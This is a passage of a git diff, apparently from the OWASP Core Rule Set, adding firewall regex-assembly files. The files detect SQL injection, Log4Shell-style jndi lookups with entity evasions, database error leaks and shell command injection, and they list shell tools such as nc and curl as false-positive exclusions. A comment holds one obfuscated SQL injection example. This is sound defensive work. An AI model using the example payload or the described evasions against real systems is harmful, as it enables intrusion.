'{"a":2,"c":[4,5,{"f":7}]}' -> '$.c[2].f' = 7 +##! SQLite: '{"a":2,"c":[4,5,{"f":7}]}' <- '$.c[2].f' = 7 +##! SQLite: '{"a":2,"c":[4,5,{"f":7}]}' < '$.c[2].f' = 7 +##! SQLite: '{"a":2,"c":[4,5,{"f":7}]}' > '$.c[2].f' = 7 +##! MySQL: JSON_EXTRACT('{"id": 14, "name": "Aztalan"}', '$.name') = 'Aztalan' + +##!> define quotes [\"'`] +##!> define operators (?:@>|<@|\?|\?\||\?&|#>|#>>|->>|<|>|->|<-) +##!> define json_ending_brackets [\]\}] +##!> define json_starting_brackets [\[\{] + +##!> assemble + ##! https://regex101.com/r/mzG5Fg/1 + {{quotes}}{{json_starting_brackets}}.*{{json_ending_brackets}}{{quotes}}.*(::.*jsonb?)?.*{{operators}} + {{operators}}{{quotes}}{{json_starting_brackets}}.*{{json_ending_brackets}}{{quotes}} + + ##! example: SELECT id FROM users WHERE id=JsoN_EXTraCT/**/(/**/' {"a":1} '/**/,/**/' $.a '/**/); + json_extract.*\(.*\) +##!< diff --git a/regex-assembly/942560.ra b/regex-assembly/942560.ra new file mode 100644 index 0000000000..cb40cfa9e9 --- /dev/null +++ b/regex-assembly/942560.ra @@ -0,0 +1,8 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +1\.e, +1\.e\( +1\.e\) diff --git a/regex-assembly/944150.ra b/regex-assembly/944150.ra new file mode 100644 index 0000000000..523aebf5ae --- /dev/null +++ b/regex-assembly/944150.ra @@ -0,0 +1,23 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! The following is an expansion of +##! (?:\${[^}]{0,15}\${|\${(?:jndi|ctx)) +##! where every character also matches the equivalent named HTML entity. +##! It is a workaround for the shortcomings of `htmlEntityDecode`, which +##! handles numerical HTML entities well but only handles 5 named +##! entities. The official list of named entities can be found here: +##! https://html.spec.whatwg.org/multipage/named-characters.html. +##! +##! Note: +##! - We don't match `}` or `}` because it would enable more +##! evasions while also increasing the number of potential false positives. +##! The risk of false negatives in this case is acceptable. +##! - Omitting the terminating semi-colon can be used as an evasion with lenient +##! parsers. We catch those by making the semi-colon optional. + + +##!+ i + +(?:\$|$?)(?:\{|&(?:lbrace|lcub);?)[^}]{0,15}(?:\$|$?)(?:\{|&(?:lbrace|lcub);?) +(?:\$|$?)(?:\{|&(?:lbrace|lcub);?)(?:jndi|ctx) diff --git a/regex-assembly/944151.ra b/regex-assembly/944151.ra new file mode 100644 index 0000000000..a8174bacdf --- /dev/null +++ b/regex-assembly/944151.ra @@ -0,0 +1,22 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! The following is an expansion of +##! (?:\$\{[^}]*\$\{|\$\{(?:jndi|ctx)) +##! where every character also matches the equivalent named HTML entity. +##! It is a workaround for the shortcomings of `htmlEntityDecode`, which +##! handles numerical HTML entities well but only handles 5 named +##! entities. The official list of named entities can be found here: +##! https://html.spec.whatwg.org/multipage/named-characters.html. +##! +##! Note: +##! - We don't match `}` or `}` because it would enable more +##! evasions while also increasing the number of potential false positives. +##! The risk of false negatives in this case is acceptable. +##! - Omitting the terminating semi-colon can be used as an evasion with lenient +##! parsers. We catch those by making the semi-colon optional. + +##!+ i + +(?:\$|$?)(?:\{|&(?:lbrace|lcub);?)[^}]*(?:\$|$?)(?:\{|&(?:lbrace|lcub);?) +(?:\$|$?)(?:\{|&(?:lbrace|lcub);?)(?:jndi|ctx) diff --git a/regex-assembly/944152.ra b/regex-assembly/944152.ra new file mode 100644 index 0000000000..158445dec1 --- /dev/null +++ b/regex-assembly/944152.ra @@ -0,0 +1,18 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! The following is an expansion of +##! (?:\${[^}]{0,15}\${|\${(?:jndi|ctx)) +##! where every character also matches the equivalent named HTML entity. +##! It is a workaround for the shortcomings of `htmlEntityDecode`, which +##! handles numerical HTML entities well but only handles 5 named +##! entities. The official list of named entities can be found here: +##! https://html.spec.whatwg.org/multipage/named-characters.html. +##! +##! - Omitting the terminating semi-colon can be used as an evasion with lenient +##! parsers. We catch those by making the semi-colon optional. + + +##!+ i + +(?:\$|$?)(?:\{|&(?:lbrace|lcub);?) diff --git a/regex-assembly/951230.ra b/regex-assembly/951230.ra new file mode 100644 index 0000000000..a96b6f9cc3 --- /dev/null +++ b/regex-assembly/951230.ra @@ -0,0 +1,22 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +supplied argument is not a valid MySQL +Column count doesn't match value count at row +mysql_fetch_array\(\) +on MySQL result index +You have an error in your SQL syntax; +You have an error in your SQL syntax near +MySQL server version for the right syntax to use +\[MySQL\]\[ODBC +Column count doesn't match +Table '[^']+' doesn't exist +SQL syntax.*MySQL +##! Because of the bug in RE2 (golang), we cannot use {0,n} (a range started at 0), so it was replaced with (?:...{1,n})? +Warning.{1,10}mysql_(?:[a-z_()]{1,26})? +valid MySQL result +MySqlClient\. +ERROR [0-9]{4} \([a-z0-9]{5}\): +XPATH syntax error: diff --git a/regex-assembly/951240.ra b/regex-assembly/951240.ra new file mode 100644 index 0000000000..7be6aa136d --- /dev/null +++ b/regex-assembly/951240.ra @@ -0,0 +1,17 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +PostgreSQL query failed: +pg_query\(\) \[: +pg_exec\(\) \[: +PostgreSQL.{1,20}ERROR +##! Example match: Warning: pg_fetch_array(): 3 is not a valid PostgreSQL result resource +Warning.{1,20}\bpg_.* +valid PostgreSQL result +Npgsql\. +PG::[a-z]*Error +Supplied argument is not a valid PostgreSQL .*? resource +Unable to connect to PostgreSQL server +invalid input syntax for integer diff --git a/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra b/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra new file mode 100644 index 0000000000..3950462851 --- /dev/null +++ b/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra @@ -0,0 +1,21 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list excludes command words that are prone to cause false +##! positives from the following include files: +##! - unix-shell-upto3.ra and +##! - unix-shell-4andup.ra + +##! To reduce complexity, this file simply lists all possible +##! variants of a word, so when a word would be changed from, e.g., +##! `awk@` to `awk~`, this list would not have to be updated. + +##! This list contains a subset of commands extracted from the file unix-shell-fps-pl1.ra +##! It specifically includes commands for which false positive reports were received. + +more +more@ +more~ +time +time@ +time~ diff --git a/regex-assembly/exclude/unix-shell-fps-pl1.ra b/regex-assembly/exclude/unix-shell-fps-pl1.ra new file mode 100644 index 0000000000..a38db68644 --- /dev/null +++ b/regex-assembly/exclude/unix-shell-fps-pl1.ra @@ -0,0 +1,820 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list excludes command words that are prone to cause false +##! positives from the following include files: +##! - unix-shell-upto3.ra and +##! - unix-shell-4andup.ra + +##! To reduce complexity, this file simply lists all possible +##! variants of a word, so when a word would be changed from, e.g., +##! `awk@` to `awk~`, this list would not have to be updated. + +##! To automatically add exclusions for English words from the sources, run the following: +##! NL=$'\n' +##! original="$(grep -vE '^[#$]' regex-assembly/exclude/unix-shell-fps-pl1.ra)" +##! upto3="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-upto3.ra)" +##! rest="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-4andup.ra)" +##! english_upto3="$(util/fp-finder/spell.sh -m -e regex-assembly/include/unix-shell-upto3.ra)" +##! # strip suffixes from words so that spell.sh works +##! english_rest="$(util/fp-finder/spell.sh -m -e -s '[@~]' regex-assembly/include/unix-shell-4andup.ra)" +##! result="" +##! function update_existing { +##! if [ -z "${1}" ]; then +##! return +##! fi +##! while read -r oword; do +##! found=0 +##! while read -r eword; do +##! if grep -qE "^${eword}[@~]?" <<<"${oword}"; then +##! result="${result}${eword}${NL}" +##! result="${result}${eword}@${NL}" +##! result="${result}${eword}~${NL}" +##! found=1 +##! break +##! fi +##! done <<<"${1}" +##! if [ ${found} -eq 0 ]; then +##! result="${result}${oword}${NL}" +##! fi +##! done <<<"${original}" +##! } +##! function add_new { +##! if [ -z "${1}" ]; then +##! return +##! fi +##! while read -r eword; do +##! if ! grep -qE "^${eword}[@~]?" <<<"${original}"; then +##! result="${result}${eword}${NL}" +##! result="${result}${eword}@${NL}" +##! result="${result}${eword}~${NL}" +##! fi +##! done <<<"${1}" +##! } +##! update_existing "${english_upto3}" +##! update_existing "${english_rest}" +##! add_new "${english_upto3}" +##! add_new "${english_rest}" + +##! body_start=$(grep -n -E -m 1 '^[^#$]' regex-assembly/exclude/unix-shell-fps-pl1.ra | cut -d: -f1) +##! ed -s regex-assembly/exclude/unix-shell-fps-pl1.ra <> regex-assembly/exclude/unix-shell-fps-pl1.ra + +GET +GET@ +GET~ +HEAD +HEAD@ +HEAD~ +POST +POST@ +POST~ +ab +ab@ +ab~ +adduser +agetty +alias +alias@ +alias~ +alpine +alpine@ +alpine~ +ansible-playbook +apt +apt-get +apt@ +aptitude +aptitude@ +aptitude~ +apt~ +ar +ar@ +arch +arch@ +arch~ +aria2c +arj +arp +arp@ +arp~ +ar~ +as +as@ +ascii-xfr +ascii85 +ash +ash@ +ash~ +aspell +as~ +at +at@ +atobm +at~ +awk +awk@ +aws +aws@ +basename +basename@ +basename~ +bash +bash@ +bash~ +batch +batch@ +batch~ +bpftrace +breaksw +bridge +bridge@ +bridge~ +bundler@ +busctl +byebug +c89 +c99 +cancel +cancel@ +cancel~ +capsh@ +cat +cat@ +cat~ +cc +cc@ +cc~ +certbot +chattr +chdir@ +check_by_ssh +check_cups +check_log +check_memory +check_raid +check_ssl_cert +check_statusfile +chflags +chmod +choom +chown +chroot +chroot@ +chroot~ +clang +clang@ +clang~ +cmp +cobc +column +column@ +column~ +comm +command +command@ +command~ +composer +composer@ +composer~ +compress +compress@ +compress~ +cowsay +cowthink +cp +cp@ +cpan +cpio +cpulimit +crash +crash@ +crash~ +crontab +csplit +csvtool +cupsfilter +curl +curl@ +curl~ +cut +cut@ +cut~ +dash +dash@ +dash~ +date +date@ +date~ +dd +dd@ +dd~ +dhclient +dialog +dialog@ +dialog~ +dig +dig@ +dig~ +dir +dir@ +dir~ +dmidecode +dmsetup +dnf +docker +docker@ +docker~ +done +done@ +done~ +dosbox +dpkg +du +du@ +dvips +easy_install +eb +eb@ +eb~ +echo +echo@ +echo~ +ed +ed@ +ed~ +efax +emacs +endif +endsw +env-update +eqn +es +es@ +esac +es~ +eval +eval@ +eval~ +ex +ex@ +exec +exec@ +exec~ +exiftool +expand +expand@ +expand~ +expect +expect@ +expect~ +export +export@ +export~ +expr +ex~ +facter +fc +fc@ +fetch +fetch@ +fetch~ +fi +fi@ +file +file@ +file~ +find +find@ +find~ +finger +finger@ +finger~ +fish +fish@ +fish~ +fi~ +flock +flock@ +flock~ +fmt +fold +fold@ +fold~ +foreach +fping +ftp +ftp@ +ftp~ +function +function@ +function~ +gawk +gawk@ +gawk~ +gcore +gdb +gem +gem@ +gem~ +genie +genie@ +genie~ +genisoimage +getfacl@ +ghc +ghci +gimp +gimp@ +gimp~ +ginsh +git +git@ +git~ +go +go@ +go~ +grc +group +group@ +group~ +gtester +hash +hash@ +hash~ +hd +hd@ +head +head@ +head~ +hexdump +highlight +highlight@ +highlight~ +history +history@ +history~ +hostid +hostname +hping3 +htdigest +htpasswd +iconv +id +id@ +id~ +ifconfig +iftop +install +install@ +install~ +ionice +ip +ip6tables +ip@ +ipconfig +iptables +ip~ +ispell +java +java@ +java~ +jexec +jjs +jobs +jobs@ +jobs~ +join +join@ +join~ +journalctl +jq +jrunscript +kill +kill@ +killall +kill~ +knife +knife@ +knife~ +ksshell +last +last@ +last~ +latex +latex@ +latex~ +ld +ld@ +ldconfig +ldd +ldd@ +less +less@ +less~ +links +links@ +links~ +ln +ln@ +local +local@ +local~ +locate +locate@ +locate~ +loginctl +logname +logsave +look +look@ +look~ +lp +lp@ +lp~ +lshw +ltrace +lua +lua@ +lualatex +luatex +lwp-dump +lwp-mirror +lwp-request +lynx +lynx@ +lynx~ +mail +mail@ +mailx@ +mail~ +make +make@ +make~ +man +man@ +man~ +mawk +mkdir@ +more +more@ +more~ +mosquitto +mount +mount@ +mount~ +msgattrib +msgcat +msgconv +msgfilter +msgmerge +msguniq +mtr +mutt +mutt@ +mutt~ +mv +mv@ +mv~ +mysql +nano@ +nasm +nawk +nc +nc@ +nc~ +neofetch +net +net@ +net~ +nice +nice@ +nice~ +nl +nl@ +nm +nm@ +nmap +nm~ +node +node@ +node~ +npm +npm@ +nroff +nsenter +nslookup +null +null@ +null~ +octave +octave@ +octave~ +od +od@ +od~ +openssl +openvpn +openvt +opkg +pacman@ +parted +parted@ +parted~ +passwd +paste +paste@ +paste~ +patch +patch@ +patch~ +pax +pax@ +pax~ +pdb +pdflatex +pdftex +perf +perlsh +perms +perms@ +perms~ +pf +pf@ +pg +pic +pic@ +pico@ +pic~ +pidstat +ping +ping@ +ping~ +pip +pip@ +pip~ +pkg +pkg_info +pkginfo +pr +pr@ +pry +pry@ +pry~ +pr~ +ps +ps@ +psftp +psql +ps~ +ptx +puppet +puppet@ +puppet~ +pushd +python +python@ +python~ +rake +rake@ +rake~ +raku +rar +rar@ +readelf +red +red@ +redcarpet@ +red~ +rename +rename@ +rename~ +repeat +repeat@ +repeat~ +replace +replace@ +replace~ +restic +rev +rev@ +rev~ +rlogin +rlwrap +rm +rm@ +route +route@ +route~ +rpm +rpm@ +rpmdb +rpmquery +rpmverify +rpm~ +ruby +ruby@ +ruby~ +run-mailcap +run-parts +rview +rvim +sash +sash@ +sash~ +sched +sched@ +sched~ +screen +screen@ +screen~ +script +script@ +script~ +self +self@ +self~ +service +service@ +service~ +set +set@ +setarch +setfacl@ +set~ +sg +sg@ +sg~ +shadow +shadow@ +shadow~ +shells +shells@ +shells~ +shuf +shutdown +shutdown@ +shutdown~ +sleep +sleep@ +sleep~ +slsh +smbclient +snap +snap@ +snap~ +soelim +sort +sort@ +sort~ +source +source@ +source~ +split +split@ +split~ +sqlite3 +ss +ss@ +ssh-keygen +ssh-keyscan +sshpass +ss~ +start-stop-daemon +stdbuf +strace +strings +strings@ +strings~ +su +su@ +systemctl +systemd-resolve +tac +tail +tail@ +tail~ +tar +tar@ +tar~ +task +task@ +taskset +task~ +tbl +tclsh +tcp +tcp@ +tcpdump +tcp~ +tee +tee@ +tee~ +tex +tex@ +tex~ +tftp +tic +tic@ +tic~ +time +time@ +timedatectl +time~ +tmux +top +top@ +top~ +touch +touch@ +touch~ +troff +tshark +ul +ul@ +ulimit@ +uncompress +uncompress@ +uncompress~ +unexpand +uniq +unlink +unlink@ +unlink~ +unset +unset@ +unset~ +unshare@ +unzip +unzip@ +unzip~ +up2date@ +update-alternatives +uudecode +uuencode +valgrind +vi +vi@ +view +view@ +view~ +vim +vim@ +vimdiff +vim~ +virsh +vi~ +volatility +volatility@ +volatility~ +w +w@ +wall +wall@ +wall~ +watch +watch@ +watch~ +wc +whiptail +whiptail@ +whiptail~ +who +who@ +whois +who~ +wireshark +wish +wish@ +wish~ +w~ +xelatex +xetex +xmodmap +xmore +xpad +xterm +xxd +yarn +yarn@ +yarn~ +yelp +yelp@ +yelp~ +yes +yes@ +yes~ +yum +zathura +zero +zero@ +zero~ +zip +zip@ +zip~ +zsoelim +zypper diff --git a/regex-assembly/exclude/unix-shell-fps-pl2-start-of-string.ra b/regex-assembly/exclude/unix-shell-fps-pl2-start-of-string.ra new file mode 100644 index 0000000000..257ac227ae --- /dev/null +++ b/regex-assembly/exclude/unix-shell-fps-pl2-start-of-string.ra @@ -0,0 +1,19 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list excludes command words that are prone to cause false +##! positives from the following include files: +##! - unix-shell-upto3.ra +##! - unix-shell-4andup.ra + +##! To reduce complexity, this file simply lists all possible +##! variants of a word, so when a word would be changed from, e.g., +##! `awk@` to `awk~`, this list would not have to be updated. +##! See also unix-shell-fps-pl1.ra. + +as +as@ +as~ +at +at@ +at~ diff --git a/regex-assembly/exclude/unix-shell-fps-pl2.ra b/regex-assembly/exclude/unix-shell-fps-pl2.ra new file mode 100644 index 0000000000..d55b11dd7e --- /dev/null +++ b/regex-assembly/exclude/unix-shell-fps-pl2.ra @@ -0,0 +1,43 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list excludes command words that are prone to cause false +##! positives from the following include files: +##! - unix-shell-upto3.ra +##! - unix-shell-4andup.ra + +##! To reduce complexity, this file simply lists all possible +##! variants of a word, so when a word would be changed from, e.g., +##! `awk@` to `awk~`, this list would not have to be updated. +##! See also unix-shell-fps-pl1.ra. + +aptitude +aptitude@ +aptitude~ +dnf +dnf@ +dnf~ +more +more@ +more~ +pacman +pacman@ +pacman~ +ps +ps@ +ps~ +time +time@ +time~ +up2date +up2date@ +up2date~ +vi +vi@ +vi~ +who +who@ +who~ +w +w@ +w~ diff --git a/regex-assembly/exclude/unix-shell-fps-useragents.ra b/regex-assembly/exclude/unix-shell-fps-useragents.ra new file mode 100644 index 0000000000..9cbd3f5541 --- /dev/null +++ b/regex-assembly/exclude/unix-shell-fps-useragents.ra @@ -0,0 +1,47 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list excludes command words that are prone to cause false +##! positives from the following include files: +##! +##! - unix-shell-upto3.ra +##! - unix-shell-4andup.ra +##! - unix-shell-pl3.ra + +##! This list is managed manually and contains known user-agents causing false positives +##! in rules checking for RCE in User-Agent and Referer request header. + +##! To reduce complexity, this file simply lists all possible +##! variants of a word, so when a word would be changed from, e.g., +##! `curl@` to `curl~`, this list would not have to be updated. +##! See also unix-shell-fps-pl1.ra. + +# CPanel client (https://cpanel.net): Cpanel-HTTP-Client/1.0 +cpan +cpan@ +cpan~ +# curl (https://curl.se): curl/8.1.2 +curl +curl@ +curl~ +# Links browser (https://en.wikipedia.org/wiki/Links_(web_browser)): Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48) +links +links@ +links~ +# Requests (https://docs.python-requests.org/en/latest/index.html): python-requests/2.31.0 +# urllib (https://docs.python.org/3/library/urllib.html): Python-urllib/3.9 +python +python@ +python~ +# Snapchat URL Preview Service (https://developers.snap.com/robots): Snap URL Preview Service; bot; snapchat; https://developers.snap.com/robots +snap +snap@ +snap~ +# w3m browser (https://en.wikipedia.org/wiki/W3m): w3m/0.5.1 +w3m +w3m@ +w3m~ +# wget (https://www.gnu.org/software/wget/): wget +wget +wget@ +wget~ diff --git a/regex-assembly/exclude/windows-commands-fps.ra b/regex-assembly/exclude/windows-commands-fps.ra new file mode 100644 index 0000000000..a1d77375c5 --- /dev/null +++ b/regex-assembly/exclude/windows-commands-fps.ra @@ -0,0 +1,89 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list excludes command words that are prone to cause false +##! because they're common English words. +##! +##! This list can be generated with: +##! util/fp-finder/spell.sh -m regex-assembly/include/windows-commands.ra + +active +add +append +arp +assign +at +attributes +break +call +cd +change +choice +cipher +clean +clip +cls +color +comp +compact +convert +copy +create +date +delete +detail +echo +edit +erase +exec +exit +expand +expose +extend +extract +find +finger +fondue +format +ftp +help +inactive +label +list +md +mode +more +mount +move +msg +online +path +pause +ping +print +prompt +query +recover +rem +remove +rename +repair +replace +reset +retain +revert +select +shadow +shift +shrink +shutdown +sort +start +time +title +tree +type +ver +verifier +verify +writer diff --git a/regex-assembly/include/932130.ra b/regex-assembly/include/932130.ra new file mode 100644 index 0000000000..b5ac4977f6 --- /dev/null +++ b/regex-assembly/include/932130.ra @@ -0,0 +1,13 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +\$\(.*\) +\$\{.*\} +<\(.*\) +>\(.*\) +\$\(\(.*\)\) + +##! Find wordlist bypasses using [ ] glob characters, like: /e[t]c +##! Require a / in front to prevent false positives like [text in brackets] +/\w*\[!.+\] +/\w*\[.+\] diff --git a/regex-assembly/include/allowed-charsets.ra b/regex-assembly/include/allowed-charsets.ra new file mode 100644 index 0000000000..bf902f0f1d --- /dev/null +++ b/regex-assembly/include/allowed-charsets.ra @@ -0,0 +1,9 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list is in sync with the default value of tx.allowed_request_content_type_charset. + +iso-8859-1 +iso-8859-15 +utf-8 +windows-1252 diff --git a/regex-assembly/include/charset-specification-no-anchors.ra b/regex-assembly/include/charset-specification-no-anchors.ra new file mode 100644 index 0000000000..2cad0b73a1 --- /dev/null +++ b/regex-assembly/include/charset-specification-no-anchors.ra @@ -0,0 +1,112 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! The expression generated from this file matches a full HTTP +##! `Accept` header by following the specification as far as +##! necessary, while restricting the `charset` parameter +##! to a list of explicitly allowed values. +##! Where possible, the expression matches tokens "loosely", +##! to reduce complexity and the risk of false positives. + +##! As this specification is used by several rules, we now +##! store it as an include file. + +##! Specifications: +##! https://httpwg.org/specs/rfc7231.html#request.conneg +##! https://httpwg.org/specs/rfc7230.html + +##! Helpers +##!> define non-token-without-dquote-chars (),/:;<=>?![\x5c\]{} + +##!> define non-token-chars \"{{non-token-without-dquote-chars}} + +##!> define token-chars [^{{non-token-chars}}] + +##!> define token-with-dquote-chars [^{{non-token-without-dquote-chars}}] + +##!> define type-subtype (?:\*|{{token-chars}}+) + +##! The specification does not allow `*` in place of `*/*` but +##! enough clients use `*` for it to be an issue. Thus, it is +##! explicitly allowed here. +##!> define media-type (?:(?:{{type-subtype}}/{{type-subtype}})|\*) + +##! list of allowed charsets +##!> assemble + (?:"? + ##!=> + ##!> include allowed-charsets + ##!=> + \b"?)) + ##!=< allowed-charsets +##!< + + +##! Main assembly +##!> assemble + (?:{{media-type}}) + ##!=> + (?:\s*;\s* + ##!=> + (?:(?:charset\s*=\s* + ##!=> + ##!=> allowed-charsets + + ##! If the first part wasn't a "charset", then + ##! anything is allowed here that is not "charset". + ##! Note that this doesn't follow the RFC strictly. + |(?: + ##!=> + ##! Do not match space, otherwise the following would be possible: + ##! "text/html; charset=invalid" + ##! `charset` would be matched by `{{token-chars}}` + [^c\s{{non-token-chars}}]{{token-chars}}* + c[^h{{non-token-chars}}]{{token-chars}}* + ch[^a{{non-token-chars}}]{{token-chars}}* + cha[^r{{non-token-chars}}]{{token-chars}}* + char[^s{{non-token-chars}}]{{token-chars}}* + chars[^e{{non-token-chars}}]{{token-chars}}* + charse[^t{{non-token-chars}}]{{token-chars}}* + ##!=> + )\s*=\s*{{token-with-dquote-chars}}+) + ##!=> + ##! Clients like to violate the RFC, be lenient with + ##! terminating semi-colons. + ;? + ##!=> + )* + ##!=> + + ##! Multiple "media-range" expressions can be + ##! specified, comma separated. + (?:\s*,\s* + ##!=> + (?:{{media-type}}) + ##!=> + (?:\s*;\s* + ##!=> + (?:(?:charset\s*=\s* + ##!=> + ##!=> allowed-charsets + |(?: + ##!=> + ##! Do not match space, otherwise the following would be possible: + ##! "text/html; charset=invalid" + ##! `charset` would be matched by `{{token-chars}}` + [^c\s{{non-token-chars}}]{{token-chars}}* + c[^h{{non-token-chars}}]{{token-chars}}* + ch[^a{{non-token-chars}}]{{token-chars}}* + cha[^r{{non-token-chars}}]{{token-chars}}* + char[^s{{non-token-chars}}]{{token-chars}}* + chars[^e{{non-token-chars}}]{{token-chars}}* + charse[^t{{non-token-chars}}]{{token-chars}}* + ##!=> + )\s*=\s*{{token-with-dquote-chars}}+) + ##!=> + ##! Clients like to violate the RFC, be lenient with + ##! terminating semi-colons. + ;? + ##!=> + )*)* + ##!=> +##!< diff --git a/regex-assembly/include/charset-specification.ra b/regex-assembly/include/charset-specification.ra new file mode 100644 index 0000000000..24f2127d49 --- /dev/null +++ b/regex-assembly/include/charset-specification.ra @@ -0,0 +1,21 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! The expression generated from this file matches a full HTTP +##! `Accept` header by following the specification as far as +##! necessary, while restricting the `charset` parameter +##! to a list of explicitly allowed values. +##! Where possible, the expression matches tokens "loosely", +##! to reduce complexity and the risk of false positives. + +##! As this specification is used by several rules, we now +##! store it as an include file. + +##! Specifications: +##! https://httpwg.org/specs/rfc7231.html#request.conneg +##! https://httpwg.org/specs/rfc7230.html + +##!^ ^ +##!$ $ + +##!> include charset-specification-no-anchors diff --git a/regex-assembly/include/js-truthy-values.ra b/regex-assembly/include/js-truthy-values.ra new file mode 100644 index 0000000000..5e229bb9aa --- /dev/null +++ b/regex-assembly/include/js-truthy-values.ra @@ -0,0 +1,49 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Falsy and negations +##!> assemble + !+ + ##!=> + false + null + undefined + NaN + [-+]?0 + "{2} + '{2} + `{2} +##!< + +##! Truthy and double negations (word boundary) +##!> assemble + (?:!!)* + ##!=> + true + [-+]?Infinity + [-+]?[1-9]\d* + new [a-zA-Z]\w* + this + window + String + Boolean + Object + Array + Function + ##!=> + \b + ##!=> +##!< + + +##! Truthy and double negations (no word boundary: anything that ends +##! with a special character) +##!> assemble + (?:!!)* + ##!=> + \{.*\} + \[.*\] + "[^"]+" + '[^']+' + `[^`]+` +##!< diff --git a/util/regexp-assemble/regexp-942150.data b/regex-assembly/include/sql-injection-function-names.ra similarity index 52% rename from util/regexp-assemble/regexp-942150.data rename to regex-assembly/include/sql-injection-function-names.ra index 66f1ed8201..91b47bf80d 100644 --- a/util/regexp-assemble/regexp-942150.data +++ b/regex-assembly/include/sql-injection-function-names.ra @@ -1,5 +1,9 @@ -abs -acos +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!^ \b +##!$ \W*\( + adddate addtime aes_decrypt @@ -9,57 +13,49 @@ asciistr asin atan atan2 -avg benchmark -bin bin_to_num bit_and bit_count bit_length bit_or bit_xor -cast -ciel -cieling char_length -char character_length -charset -chr +ciel +cieling coalesce coercibility collation compress -concat_ws concat +concat_ws connection_id conv -convert_tz convert +convert_tz cos cot -count -dcount cr32 curdate current_date +current_setting current_time current_timestamp current_user curtime database -date +database_to_xml date_add date_format date_sub datediff -day dayname dayofmonth dayofweek dayofyear +dcount decode -default degrees des_decrypt des_encrypt @@ -67,30 +63,28 @@ dump elt encode encrypt +endswith +ends_with exp export_set extract extractvalue -field field_in_set find_in_set -floor -format found_rows from_base64 from_days from_unixtime +geometrycollection get_format get_lock +getpgusername greatest group_concat +gtid_subset hex hextoraw -rawtohex -hour -if ifnull -in inet6_aton inet6_ntoa inet_aton @@ -98,139 +92,194 @@ inet_ntoa insert instr interval -isnull is_free_lock +is_ipv4 is_ipv4_compat is_ipv4_mapped -is_ipv4 is_ipv6 -is_not_null is_not +is_not_null is_null +is_superuser is_used_lock -last +isnull +json +json_agg +json_array +json_array_elements +json_array_elements_text +json_array_length +json_build_array +json_build_object +json_each +json_each_text +json_extract_path +json_extract_path_text +json_object +json_object_agg +json_object_keys +json_populate_record +json_populate_recordset +json_strip_nulls +json_to_record +json_to_recordset +json_typeof +jsonb +jsonb_array +jsonb_array_elements +jsonb_array_elements_text +jsonb_array_length +jsonb_build_array +jsonb_build_object +jsonb_object +jsonb_each +jsonb_each_text +jsonb_extract_path +jsonb_extract_path_text +jsonb_insert +jsonb_object +jsonb_object_agg +jsonb_object_keys +jsonb_path_exists +jsonb_path_exists_tz +jsonb_path_match +jsonb_path_match_tz +jsonb_path_query +jsonb_path_query_array +jsonb_path_query_array_tz +jsonb_path_query_first +jsonb_path_query_first_tz +jsonb_path_query_tz +jsonb_populate_record +jsonb_populate_recordset +jsonb_pretty +jsonb_set +jsonb_set_lax +jsonb_strip_nulls +jsonb_to_record +jsonb_to_recordset +jsonb_typeof +jsonpath last_day last_inser_id lcase least left -length -ln +likelihood +likely +linestring +lo_from_bytea +lo_put load_file -local localtimestamp locate -log -log2 log10 +log2 lower lpad ltrim make_set makedate master_pos_wait -max md5 microsecond mid -min -minute -mod -month monthname +multilinestring +multipoint +multipolygon name_const not_in -now nullif oct octet_length old_password ord -password period_add period_diff -pi +pg_client_encoding +pg_database +pg_largeobject +pg_ls_dir +pg_read_file +pg_sleep +pg_user +polygon position pow -power procedure_analyse quarter +query_to_xml quote radians rand +rawtohex release_lock -repeat -replace -reverse -right -round row_count +row_to_json rpad rtrim schema sec_to_time -second session_user sha sha1 sha2 -sign sin -pg_sleep -sleep soundex space +sqlite_compileoption_get +sqlite_compileoption_used +sqlite_source_id sqrt +startswith +starts_with std stddev_pop stddev_samp str_to_date strcmp subdate +substr substring substring_index -substr subtime -sum sysdate system_user -tan -time +time_format +time_to_sec +timediff timestamp timestampadd timestampdiff -timediff -time_format -time_to_sec to_base64 -todays -toseconds +to_json +to_jsonb tochar +todays tonchar +toseconds trim truncate ucase uncompress uncompressed_length unhex +unistr unix_timestamp +unlikely updatexml -upper -user +use_json_null utc_date utc_time utc_timestamp uuid uuid_short -values var_pop var_samp variance -version -week weekday weekofyear weight_string -year -yearweek xmltype +yearweek diff --git a/regex-assembly/include/sql-injection-mysql-postgresql-procedures-functions.ra b/regex-assembly/include/sql-injection-mysql-postgresql-procedures-functions.ra new file mode 100644 index 0000000000..a58f2c4279 --- /dev/null +++ b/regex-assembly/include/sql-injection-mysql-postgresql-procedures-functions.ra @@ -0,0 +1,23 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + 